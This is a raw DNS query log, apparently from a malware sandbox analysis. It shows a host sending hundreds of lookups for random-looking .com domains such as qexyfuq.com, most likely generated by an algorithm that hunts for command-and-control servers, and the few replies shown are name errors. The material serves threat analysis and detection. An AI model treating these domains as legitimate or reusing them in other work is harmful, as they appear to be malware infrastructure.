                                                                                                                                                                                                          Sep 8, 2024 10:54:23.769350052 CEST192.168.2.91.1.1.10x8e1cStandard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.772747993 CEST192.168.2.91.1.1.10x839dStandard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.772804022 CEST192.168.2.91.1.1.10x7ebbStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.773153067 CEST192.168.2.91.1.1.10xed3dStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.773695946 CEST192.168.2.91.1.1.10x5fa2Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.773818970 CEST192.168.2.91.1.1.10xe2afStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.774208069 CEST192.168.2.91.1.1.10x4582Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.774662971 CEST192.168.2.91.1.1.10x8d57Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.776242018 CEST192.168.2.91.1.1.10xb3bfStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.777790070 CEST192.168.2.91.1.1.10xaa92Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.777882099 CEST192.168.2.91.1.1.10x7537Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.778239965 CEST192.168.2.91.1.1.10xf157Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.878438950 CEST192.168.2.91.1.1.10x20f3Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.878767967 CEST192.168.2.91.1.1.10xccfdStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.878977060 CEST192.168.2.91.1.1.10x74d8Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879194021 CEST192.168.2.91.1.1.10x51caStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879345894 CEST192.168.2.91.1.1.10xc4dcStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879494905 CEST192.168.2.91.1.1.10xcb59Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.879686117 CEST192.168.2.91.1.1.10xbb46Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.880186081 CEST192.168.2.91.1.1.10xbbbbStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.880460024 CEST192.168.2.91.1.1.10x4ed9Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881139994 CEST192.168.2.91.1.1.10x33c8Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881320000 CEST192.168.2.91.1.1.10x6ab2Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881470919 CEST192.168.2.91.1.1.10x4940Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881617069 CEST192.168.2.91.1.1.10x47f5Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881752968 CEST192.168.2.91.1.1.10x9689Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.881912947 CEST192.168.2.91.1.1.10x59bfStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.882067919 CEST192.168.2.91.1.1.10xc4c0Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.882215977 CEST192.168.2.91.1.1.10x8eb0Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.884020090 CEST192.168.2.91.1.1.10x34ccStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:23.884453058 CEST192.168.2.91.1.1.10x5e48Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:24.191589117 CEST192.168.2.91.1.1.10x2b70Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.309174061 CEST192.168.2.91.1.1.10x50abStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.313591957 CEST192.168.2.91.1.1.10xc2f9Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.315854073 CEST192.168.2.91.1.1.10xcd10Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.317485094 CEST192.168.2.91.1.1.10x64edStandard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.318073988 CEST192.168.2.91.1.1.10xa187Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.321274042 CEST192.168.2.91.1.1.10xf295Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.322721958 CEST192.168.2.91.1.1.10x57aStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.327919006 CEST192.168.2.91.1.1.10x63c8Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341270924 CEST192.168.2.91.1.1.10x8b0aStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341455936 CEST192.168.2.91.1.1.10xf925Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341730118 CEST192.168.2.91.1.1.10xfd5cStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.341916084 CEST192.168.2.91.1.1.10x9bd9Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.353703976 CEST192.168.2.91.1.1.10xb8daStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.357172012 CEST192.168.2.91.1.1.10x8468Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.360814095 CEST192.168.2.91.1.1.10x93f5Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.361223936 CEST192.168.2.91.1.1.10x23bdStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.362529993 CEST192.168.2.91.1.1.10xb454Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.362848043 CEST192.168.2.91.1.1.10xddeeStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.364397049 CEST192.168.2.91.1.1.10x5c07Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.364737988 CEST192.168.2.91.1.1.10x2221Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.375216007 CEST192.168.2.91.1.1.10x57Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.375968933 CEST192.168.2.91.1.1.10x163dStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.376486063 CEST192.168.2.91.1.1.10x4946Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.667465925 CEST192.168.2.91.1.1.10x8024Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.669296980 CEST192.168.2.91.1.1.10xcfcaStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.670372009 CEST192.168.2.91.1.1.10xf186Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.670989990 CEST192.168.2.91.1.1.10xedecStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.671566963 CEST192.168.2.91.1.1.10x7cbcStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.671844006 CEST192.168.2.91.1.1.10x98f4Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.672167063 CEST192.168.2.91.1.1.10xe97bStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.672590017 CEST192.168.2.91.1.1.10x5855Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.672784090 CEST192.168.2.91.1.1.10xe794Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.673110962 CEST192.168.2.91.1.1.10x163dStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.673624992 CEST192.168.2.91.1.1.10x9123Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.673907995 CEST192.168.2.91.1.1.10x2282Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.674392939 CEST192.168.2.91.1.1.10x6426Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.674808979 CEST192.168.2.91.1.1.10x4d18Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.674912930 CEST192.168.2.91.1.1.10xbb24Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.675606966 CEST192.168.2.91.1.1.10xa463Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.676078081 CEST192.168.2.91.1.1.10xa818Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.676600933 CEST192.168.2.91.1.1.10x7923Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.677118063 CEST192.168.2.91.1.1.10x8cbfStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.677392006 CEST192.168.2.91.1.1.10x2d98Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.677911997 CEST192.168.2.91.1.1.10x8d92Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.681274891 CEST192.168.2.91.1.1.10x3e17Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.681480885 CEST192.168.2.91.1.1.10xdedeStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693245888 CEST192.168.2.91.1.1.10x1f3Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693540096 CEST192.168.2.91.1.1.10x8221Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:25.693674088 CEST192.168.2.91.1.1.10x1851Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.943680048 CEST192.168.2.91.1.1.10x87adStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.948909044 CEST192.168.2.91.1.1.10x1bb0Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.949147940 CEST192.168.2.91.1.1.10x3f9dStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.949393988 CEST192.168.2.91.1.1.10x3792Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.950789928 CEST192.168.2.91.1.1.10x983Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.950937033 CEST192.168.2.91.1.1.10x8b5dStandard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.951131105 CEST192.168.2.91.1.1.10xc55Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.951280117 CEST192.168.2.91.1.1.10xb32Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.951514006 CEST192.168.2.91.1.1.10x2828Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.952007055 CEST192.168.2.91.1.1.10x3730Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.955869913 CEST192.168.2.91.1.1.10x619bStandard query (0)vojyqac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956211090 CEST192.168.2.91.1.1.10x6038Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956396103 CEST192.168.2.91.1.1.10x2204Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956551075 CEST192.168.2.91.1.1.10x7989Standard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956715107 CEST192.168.2.91.1.1.10x3b0fStandard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.956969976 CEST192.168.2.91.1.1.10x981dStandard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.957205057 CEST192.168.2.91.1.1.10x971fStandard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.959494114 CEST192.168.2.91.1.1.10xf8a0Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.960231066 CEST192.168.2.91.1.1.10x1a1bStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.960555077 CEST192.168.2.91.1.1.10x3e25Standard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.960833073 CEST192.168.2.91.1.1.10x5899Standard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.961178064 CEST192.168.2.91.1.1.10x2258Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.961724043 CEST192.168.2.91.1.1.10xb415Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.963481903 CEST192.168.2.91.1.1.10x2a9aStandard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.964118004 CEST192.168.2.91.1.1.10x3992Standard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.964493990 CEST192.168.2.91.1.1.10x8bb7Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.964915991 CEST192.168.2.91.1.1.10x84bbStandard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:28.965015888 CEST192.168.2.91.1.1.10x9bd5Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.313127041 CEST192.168.2.91.1.1.10x21a9Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.314013958 CEST192.168.2.91.1.1.10xff85Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.315570116 CEST192.168.2.91.1.1.10x79f5Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.316030979 CEST192.168.2.91.1.1.10x7701Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.316401958 CEST192.168.2.91.1.1.10x7078Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.334367990 CEST192.168.2.91.1.1.10x1640Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.338774920 CEST192.168.2.91.1.1.10x4ffeStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.339107037 CEST192.168.2.91.1.1.10xce93Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.339850903 CEST192.168.2.91.1.1.10x61a1Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.342432022 CEST192.168.2.91.1.1.10x2dfeStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.344336033 CEST192.168.2.91.1.1.10x427eStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.351192951 CEST192.168.2.91.1.1.10x2704Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.356441975 CEST192.168.2.91.1.1.10xd6b2Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.356815100 CEST192.168.2.91.1.1.10x1bacStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.358973980 CEST192.168.2.91.1.1.10x3ac8Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.363094091 CEST192.168.2.91.1.1.10x86a1Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.364815950 CEST192.168.2.91.1.1.10xecc1Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.365056992 CEST192.168.2.91.1.1.10x9b3dStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.376663923 CEST192.168.2.91.1.1.10x9139Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.376862049 CEST192.168.2.91.1.1.10xca10Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.377165079 CEST192.168.2.91.1.1.10x1b12Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.377312899 CEST192.168.2.91.1.1.10x92d7Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.377981901 CEST192.168.2.91.1.1.10x7d05Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.378134012 CEST192.168.2.91.1.1.10x65e7Standard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.382519007 CEST192.168.2.91.1.1.10x6186Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.382704973 CEST192.168.2.91.1.1.10x36a4Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.382968903 CEST192.168.2.91.1.1.10xe7dStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.383120060 CEST192.168.2.91.1.1.10xf306Standard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.389816046 CEST192.168.2.91.1.1.10x304Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.401654959 CEST192.168.2.91.1.1.10x86a6Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.401834965 CEST192.168.2.91.1.1.10x585bStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.401947021 CEST192.168.2.91.1.1.10x92fcStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.402885914 CEST192.168.2.91.1.1.10xcecdStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403137922 CEST192.168.2.91.1.1.10xd4e7Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403366089 CEST192.168.2.91.1.1.10x89ceStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403523922 CEST192.168.2.91.1.1.10xb332Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403667927 CEST192.168.2.91.1.1.10xe80bStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403804064 CEST192.168.2.91.1.1.10xd488Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.403954983 CEST192.168.2.91.1.1.10x8fb7Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.404081106 CEST192.168.2.91.1.1.10xeb9eStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.404306889 CEST192.168.2.91.1.1.10xaa68Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.404496908 CEST192.168.2.91.1.1.10x9b14Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.407900095 CEST192.168.2.91.1.1.10x291aStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.408166885 CEST192.168.2.91.1.1.10x646eStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.408374071 CEST192.168.2.91.1.1.10x3779Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.408922911 CEST192.168.2.91.1.1.10x5e09Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409096956 CEST192.168.2.91.1.1.10xc5Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409326077 CEST192.168.2.91.1.1.10xf298Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409533024 CEST192.168.2.91.1.1.10xcfbaStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409710884 CEST192.168.2.91.1.1.10xb3f6Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.409882069 CEST192.168.2.91.1.1.10xf84bStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410041094 CEST192.168.2.91.1.1.10x239Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410178900 CEST192.168.2.91.1.1.10x9a0cStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410485029 CEST192.168.2.91.1.1.10x98fbStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.410753965 CEST192.168.2.91.1.1.10x4f8Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411079884 CEST192.168.2.91.1.1.10x2a37Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.411340952 CEST192.168.2.91.1.1.10x4a75Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:32.413945913 CEST192.168.2.91.1.1.10xa1a4Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573093891 CEST192.168.2.91.1.1.10x9b9eStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573479891 CEST192.168.2.91.1.1.10xf28cStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.573714018 CEST192.168.2.91.1.1.10x4c84Standard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.574079037 CEST192.168.2.91.1.1.10xa4eaStandard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.576103926 CEST192.168.2.91.1.1.10xbbdeStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:41.578700066 CEST192.168.2.91.1.1.10xa3ceStandard query (0)volybak.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.674657106 CEST1.1.1.1192.168.2.90x4930Name error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.677138090 CEST1.1.1.1192.168.2.90x1c57Name error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.677711010 CEST1.1.1.1192.168.2.90x26fcName error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682501078 CEST1.1.1.1192.168.2.90xdba1Name error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.689105034 CEST1.1.1.1192.168.2.90xfe8eName error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.692468882 CEST1.1.1.1192.168.2.90x587fName error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.692492962 CEST1.1.1.1192.168.2.90x9c2cName error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
